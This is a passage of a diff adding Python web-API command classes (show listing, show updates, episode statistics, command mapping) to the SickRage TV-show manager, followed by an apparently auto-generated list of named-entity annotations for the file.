+ elif status == 0: # we don't count NONE = 0 = N/A + pass + else: + episode_status_counts_total[status] += 1 + + # the outgoing container + episodes_stats = {""downloaded"": {}} + # turning codes into strings + for 
statusCode in episode_qualities_counts_download: + if statusCode == ""total"": + episodes_stats[""downloaded""][""total""] = episode_qualities_counts_download[statusCode] + continue + status, quality = Quality.splitCompositeStatus(int(statusCode)) + status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """") + episodes_stats[""downloaded""][status_string] = episode_qualities_counts_download[statusCode] + + episodes_stats[""snatched""] = {} + # turning codes into strings + # and combining proper and normal + for statusCode in episode_qualities_counts_snatch: + if statusCode == ""total"": + episodes_stats[""snatched""][""total""] = episode_qualities_counts_snatch[statusCode] + continue + status, quality = Quality.splitCompositeStatus(int(statusCode)) + status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """") + if Quality.qualityStrings[quality] in episodes_stats[""snatched""]: + episodes_stats[""snatched""][status_string] += episode_qualities_counts_snatch[statusCode] + else: + episodes_stats[""snatched""][status_string] = episode_qualities_counts_snatch[statusCode] + + # episodes_stats[""total""] = {} + for statusCode in episode_status_counts_total: + if statusCode == ""total"": + episodes_stats[""total""] = episode_status_counts_total[statusCode] + continue + status, quality = Quality.splitCompositeStatus(int(statusCode)) + status_string = statusStrings[statusCode].lower().replace("" "", ""_"").replace(""("", """").replace( + "")"", """") + episodes_stats[status_string] = episode_status_counts_total[statusCode] + + return _responds(RESULT_SUCCESS, episodes_stats) + + +class CMD_ShowUpdate(ApiCall): + _help = { + ""desc"": ""Update a show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Update a show in SickRage """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + try: + sickbeard.showQueueScheduler.action.updateShow(show_obj, True) # @UndefinedVariable + return _responds(RESULT_SUCCESS, msg=str(show_obj.name) + "" has queued to be updated"") + except CantUpdateShowException as e: + logger.log(u""API::Unable to update show: {0}"".format(str(e)), logger.DEBUG) + return _responds(RESULT_FAILURE, msg=""Unable to update "" + str(show_obj.name)) + + +class CMD_Shows(ApiCall): + _help = { + ""desc"": ""Get all shows in SickRage"", + ""optionalParameters"": { + ""sort"": {""desc"": ""The sorting strategy to apply to the list of shows""}, + ""paused"": {""desc"": ""True to include paused shows, False otherwise""}, + }, + } + + def __init__(self, args, kwargs): + # required + # optional + self.sort, args = self.check_params(args, kwargs, ""sort"", ""id"", False, ""string"", [""id"", ""name""]) + self.paused, args = self.check_params(args, kwargs, ""paused"", None, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get all shows in SickRage """""" + shows = {} + for curShow in sickbeard.showList: + + if not self.paused and 
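# CMD_Shows.run treats the 'paused' parameter as tri-state: left unset
# (None) or set to False, paused shows are skipped; set to True, they are
# included. A standalone sketch of the same predicate:
def include_show_sketch(paused_param, show_is_paused):
    # equivalent to skipping when `not paused_param and show_is_paused`
    return bool(paused_param) or not show_is_paused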
curShow.paused: # If we're not including paused shows, and the current show is paused + continue # continue with the next show + + indexer_show = helpers.mapIndexersToShow(curShow) + + show_dict = { + ""paused"": (0, 1)[curShow.paused], + ""quality"": get_quality_string(curShow.quality), + ""language"": curShow.lang, + ""air_by_date"": (0, 1)[curShow.air_by_date], + ""sports"": (0, 1)[curShow.sports], + ""anime"": (0, 1)[curShow.anime], + ""indexerid"": curShow.indexerid, + ""tvdbid"": indexer_show[1], + ""network"": curShow.network, + ""show_name"": curShow.name, + ""status"": curShow.status, + ""subtitles"": (0, 1)[curShow.subtitles], + } + + if helpers.tryInt(curShow.nextaired, 1) > 693595: # 1900 + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(curShow.nextaired, curShow.airs, show_dict['network'])) + show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + show_dict['next_ep_airdate'] = '' + + show_dict[""cache""] = CMD_ShowCache((), {""indexerid"": curShow.indexerid}).run()[""data""] + if not show_dict[""network""]: + show_dict[""network""] = """" + if self.sort == ""name"": + shows[curShow.name] = show_dict + else: + shows[curShow.indexerid] = show_dict + + return _responds(RESULT_SUCCESS, shows) + + +class CMD_ShowsStats(ApiCall): + _help = {""desc"": ""Get the global shows and episodes statistics""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the global shows and episodes statistics """""" + stats = Show.overall_stats() + + return _responds(RESULT_SUCCESS, { + 'ep_downloaded': stats['episodes']['downloaded'], + 'ep_snatched': stats['episodes']['snatched'], + 'ep_total': stats['episodes']['total'], + 'shows_active': stats['shows']['active'], + 'shows_total': stats['shows']['total'], + }) + + +# WARNING: never define a cmd call string that contains a ""_"" (underscore) +# this is reserved for cmd indexes used while cmd chaining + +# WARNING: never define a param name that contains a ""."" (dot) +# this is reserved for cmd namespaces used while cmd chaining +function_mapper = { + ""help"": CMD_Help, + ""future"": CMD_ComingEpisodes, + ""episode"": CMD_Episode, + ""episode.search"": CMD_EpisodeSearch, + ""episode.setstatus"": CMD_EpisodeSetStatus, + ""episode.subtitlesearch"": CMD_SubtitleSearch, + ""exceptions"": CMD_Exceptions, + ""history"": CMD_History, + ""history.clear"": CMD_HistoryClear, + ""history.trim"": CMD_HistoryTrim, + ""failed"": CMD_Failed, + ""backlog"": CMD_Backlog, + ""logs"": CMD_Logs, + ""sb"": CMD_SickBeard, + ""postprocess"": CMD_PostProcess, + ""sb.addrootdir"": CMD_SickBeardAddRootDir, + ""sb.checkversion"": CMD_SickBeardCheckVersion, + ""sb.checkscheduler"": CMD_SickBeardCheckScheduler, + ""sb.deleterootdir"": CMD_SickBeardDeleteRootDir, + ""sb.getdefaults"": CMD_SickBeardGetDefaults, + ""sb.getmessages"": CMD_SickBeardGetMessages, + ""sb.getrootdirs"": CMD_SickBeardGetRootDirs, + ""sb.pausebacklog"": CMD_SickBeardPauseBacklog, + ""sb.ping"": CMD_SickBeardPing, + ""sb.restart"": CMD_SickBeardRestart, + ""sb.searchindexers"": CMD_SickBeardSearchIndexers, + ""sb.searchtvdb"": CMD_SickBeardSearchTVDB, + ""sb.searchtvrage"": CMD_SickBeardSearchTVRAGE, + ""sb.setdefaults"": CMD_SickBeardSetDefaults, + ""sb.update"": CMD_SickBeardUpdate, + ""sb.shutdown"": CMD_SickBeardShutdown, + ""show"": CMD_Show, + ""show.addexisting"": CMD_ShowAddExisting, + 
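# The function_mapper table (continued below) is the API's single dispatch
# point: the command name taken from the request selects a CMD_* class,
# which is instantiated with the request's args/kwargs and run. A minimal
# sketch of that dispatch, with hypothetical request values:
def dispatch_sketch(mapper, cmd, args, kwargs):
    if cmd not in mapper:
        raise KeyError('unknown API command: %r' % cmd)
    return mapper[cmd](args, kwargs).run()

# e.g. dispatch_sketch(function_mapper, 'shows.stats', (), {})
# Per the warnings above, '_' in a command name and '.' in a parameter name
# remain reserved for command chaining, so new entries must avoid both.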
""show.addnew"": CMD_ShowAddNew, + ""show.cache"": CMD_ShowCache, + ""show.delete"": CMD_ShowDelete, + ""show.getquality"": CMD_ShowGetQuality, + ""show.getposter"": CMD_ShowGetPoster, + ""show.getbanner"": CMD_ShowGetBanner, + ""show.getnetworklogo"": CMD_ShowGetNetworkLogo, + ""show.getfanart"": CMD_ShowGetFanArt, + ""show.pause"": CMD_ShowPause, + ""show.refresh"": CMD_ShowRefresh, + ""show.seasonlist"": CMD_ShowSeasonList, + ""show.seasons"": CMD_ShowSeasons, + ""show.setquality"": CMD_ShowSetQuality, + ""show.stats"": CMD_ShowStats, + ""show.update"": CMD_ShowUpdate, + ""shows"": CMD_Shows, + ""shows.stats"": CMD_ShowsStats +} +",116822,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://code.google.com/p/sickbeard/'], ['PERSON', 'Dennis Lutter'], ['PERSON', 'Jonathon Saine'], ['LOCATION', 'http://code.google.com/p/sickbeard/'], ['PERSON', 'TODO'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sbdatetime'], ['PERSON', 'simplejson'], ['PERSON', 'RESULT_FAILURE'], ['PERSON', 'RESULT_ERROR'], ['PERSON', 'RESULT_FATAL'], ['PERSON', 'RESULT_FAILURE'], ['PERSON', 'RESULT_ERROR'], ['PERSON', 'RESULT_FATAL'], ['LOCATION', 'kwargs.iteritems'], ['PERSON', 'out_dict'], ['PERSON', 'out_dict'], ['PERSON', 'cmd_index = cmd.split'], ['PERSON', 'out_dict'], ['PERSON', 'out_dict = cur_out_dict\n\n '], ['PERSON', 'out_dict = _'], ['PERSON', 'out_dict'], ['NRP', 'kwargs'], ['PERSON', 'cur_args'], ['PERSON', 'cur_args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'old_key'], ['PERSON', 'fullhdtv'], ['PERSON', 'hdwebdl'], ['PERSON', 'root_dir'], ['PERSON', 'CMD_Help(ApiCall'], ['LOCATION', 'self.check_params(args'], ['NRP', 'self.subject'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'weekday'], ['PERSON', ""coming_episode['weekday""], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', '1900'], ['LOCATION', 'show_obj.airs'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'isinstance(ep_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'TODO'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='Unable""], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'self.force'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', ""'season'""], ['PERSON', 'ep.season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], 
['LOCATION', 'isinstance(ep_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='Unable""], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='Unable""], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'older than 30 days'], ['DATE_TIME', 'older than 30 days'], ['DATE_TIME', ""older than 30 days'""], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'cur_ep_cat'], ['LOCATION', 'cur_ep_cat'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'Mark'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hardlink'], ['URL', 'self.is'], ['LOCATION', 'self.check_params(args'], ['URL', 'self.ch'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'msg=""You'], ['PERSON', 'dGet'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['URL', 'new.in'], ['PERSON', 'check_version.updater.get_newest_commit_hash'], ['PERSON', 'backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'curNewRootDir'], ['PERSON', 'enumerate(root_dirs_new'], ['PERSON', 'curNewRootDir'], ['PERSON', 'COMING_EPS_DISPLAY_PAUSED'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'msg=""Backlog un-'], ['PERSON', 'Ping SickRage'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg=""SickRage'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['DATE_TIME', '5'], ['DATE_TIME', '6'], ['PERSON', 'COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg=""SickRage'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg=""SickRage'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'CMD_ShowCache'], ['LOCATION', 'genre_list_tmp'], ['LOCATION', 'genre_list_tmp'], ['LOCATION', 'genre_list.append(genre'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'SR'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 
'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'hdwebdl'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'TODO'], ['LOCATION', 'cache_obj.poster_path(show_obj.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='%s""], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'ShowNetworkLogo(self.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'ShowFanArt(self.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='%s""], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='%s""], ['DATE_TIME', 'seasons'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'seasons'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['NRP', 'season_list'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', '1900'], ['PERSON', 'del row[""season'], ['DATE_TIME', 'seasons'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'del row[""episode'], ['DATE_TIME', '1900'], ['DATE_TIME', 'seasons'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'sickbeard.showQueueScheduler.action.updateShow(show_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', '1900'], ['PERSON', 'CMD_SickBeardDeleteRootDir'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'sickrage.helper.com'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.show.Com'], ['URL', 'sickrage.sh'], ['URL', 'sickrage.show.Sh'], ['URL', 'sickrage.system.Re'], ['URL', 'sickrage.system.Sh'], ['URL', 'sickbeard.ve'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'Api.de'], ['URL', 'Api.de'], ['URL', 
'self.se'], ['URL', 'self.request.ar'], ['URL', 'kwargs.it'], ['URL', 'self.request.re'], ['URL', 'logger.DE'], ['URL', 'self.ca'], ['URL', 'logger.ER'], ['URL', 'self.fi'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'traceback.fo'], ['URL', 'logger.DE'], ['URL', 'logger.DE'], ['URL', 'logger.DE'], ['URL', 'self.fi'], ['URL', 'logger.DE'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'mapper.ge'], ['URL', 'show.in'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'asd.in'], ['URL', 'show.se'], ['URL', '2.in'], ['URL', 'show.se'], ['URL', 'kwarg.fi'], ['URL', 'self.ru'], ['URL', 'self.re'], ['URL', 'self.ru'], ['URL', 'self.re'], ['URL', 'self.in'], ['URL', 'ids.in'], ['URL', 'kwargs.ge'], ['URL', 'kwargs.ge'], ['URL', 'logger.ER'], ['URL', 'self.kw'], ['URL', 'self.si'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.si'], ['URL', 'self.kw'], ['URL', 'self.kw'], ['URL', 'self.kw'], ['URL', 'datetime.date.fr'], ['URL', 'date.st'], ['URL', 'datetime.date.fr'], ['URL', 'date.st'], ['URL', 'datetime.datetime.st'], ['URL', 'date.st'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'os.li'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'mapper.ke'], ['URL', 'self.su'], ['URL', 'mapper.ge'], ['URL', 'self.su'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'ComingEpisodes.sorts.ke'], ['URL', 'self.ch'], ['URL', 'ComingEpisodes.ca'], ['URL', 'ComingEpisodes.ca'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'sickbeard.COM'], ['URL', 'ComingEpisodes.ge'], ['URL', 'self.so'], ['URL', 'self.pa'], ['URL', 'episodes.ke'], ['URL', 'episodes.it'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'queue.Ma'], ['URL', 'sickbeard.searchQueueScheduler.action.ad'], ['URL', 'item.su'], ['URL', 'time.sl'], ['URL', 'item.su'], ['URL', 'obj.st'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.fo'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'ep.se'], ['URL', 'ep.st'], ['URL', 'self.st'], ['URL', 'obj.se'], ['URL', 'obj.se'], ['URL', 'obj.se'], ['URL', 'obj.st'], ['URL', 'self.st'], ['URL', 'sickbeard.US'], ['URL', 'obj.st'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'self.fo'], ['URL', 'obj.st'], ['URL', 'self.st'], ['URL', 'obj.ge'], ['URL', 'self.st'], ['URL', 'db.ma'], ['URL', 'segments.it'], ['URL', 'queue.Ba'], ['URL', 'sickbeard.searchQueueScheduler.action.ad'], ['URL', 'obj.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'obj.su'], 
['URL', 'obj.do'], ['URL', 'obj.su'], ['URL', 'subtitles.na'], ['URL', 'ui.notifications.me'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'self.li'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.li'], ['URL', 'os.pa'], ['URL', 'os.path.ba'], ['URL', 'self.li'], ['URL', 'self.ch'], ['URL', 'self.li'], ['URL', 'db.se'], ['URL', 'db.se'], ['URL', 'sickbeard.sh'], ['URL', 'db.se'], ['URL', 'shows.pa'], ['URL', 'episodes.sh'], ['URL', 'shows.in'], ['URL', 'curShow.in'], ['URL', 'curShow.ge'], ['URL', 'curShow.in'], ['URL', 'curShow.na'], ['URL', 'curShow.st'], ['URL', 'self.ch'], ['URL', 'logger.re'], ['URL', 'os.path.is'], ['URL', 'f.re'], ['URL', 're.ma'], ['URL', 'match.gr'], ['URL', 'logger.re'], ['URL', 'logger.re'], ['URL', 'x.rs'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'self.fo'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.ch'], ['URL', 'self.pro'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'sickbeard.TV'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'sickbeard.TV'], ['URL', 'processTV.pro'], ['URL', 'self.pa'], ['URL', 'self.pro'], ['URL', 'self.fo'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'sickbeard.BR'], ['URL', 'self.ve'], ['URL', 'mapper.ke'], ['URL', 'self.ch'], ['URL', 'self.de'], ['URL', 'self.ch'], ['URL', 'os.path.is'], ['URL', 'sickbeard.RO'], ['URL', 'self.de'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'self.de'], ['URL', 'dirs.in'], ['URL', 'self.de'], ['URL', 'dirs.in'], ['URL', 'sickbeard.RO'], ['URL', 'version.ch'], ['URL', 'version.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'db.se'], ['URL', 'sickbeard.searchQueueScheduler.action.is'], ['URL', 'sickbeard.searchQueueScheduler.action.is'], ['URL', 'sickbeard.backlogSearchScheduler.ne'], ['URL', 'sickbeard.SY'], ['URL', 'self.ch'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'new.in'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.ST'], ['URL', 'sickbeard.COM'], ['URL', 'ui.notifications.ge'], ['URL', 'self.rh.request.re'], ['URL', 'notification.me'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'sickbeard.searchQueueScheduler.action.pa'], ['URL', 'sickbeard.searchQueueScheduler.ac'], ['URL', 'sickbeard.st'], ['URL', 'Restart.re'], ['URL', 'thetvdb.com'], ['URL', 'self.va'], ['URL', 'sickbeard.in'], ['URL', 'self.na'], ['URL', 'self.ch'], ['URL', 'self.la'], ['URL', 'self.ch'], ['URL', 'sickbeard.IN'], ['URL', 'self.va'], ['URL', 'languages.ke'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.va'], ['URL', 'self.la'], ['URL', 'self.na'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'params.co'], ['URL', 'self.la'], ['URL', 'self.la'], ['URL', 'sickbeard.IN'], ['URL', 'self.la'], ['URL', 'classes.Al'], ['URL', 'sickbeard.in'], ['URL', 'self.na'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'params.co'], ['URL', 'self.la'], ['URL', 'self.la'], ['URL', 'sickbeard.IN'], ['URL', 'self.la'], ['URL', 
'sickbeard.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'logger.DE'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'sickbeard.ST'], ['URL', 'self.st'], ['URL', 'sickbeard.COM'], ['URL', 'Shutdown.st'], ['URL', 'version.ch'], ['URL', 'version.ru'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.la'], ['URL', 'obj.na'], ['URL', 'obj.pa'], ['URL', 'obj.su'], ['URL', 'obj.ai'], ['URL', 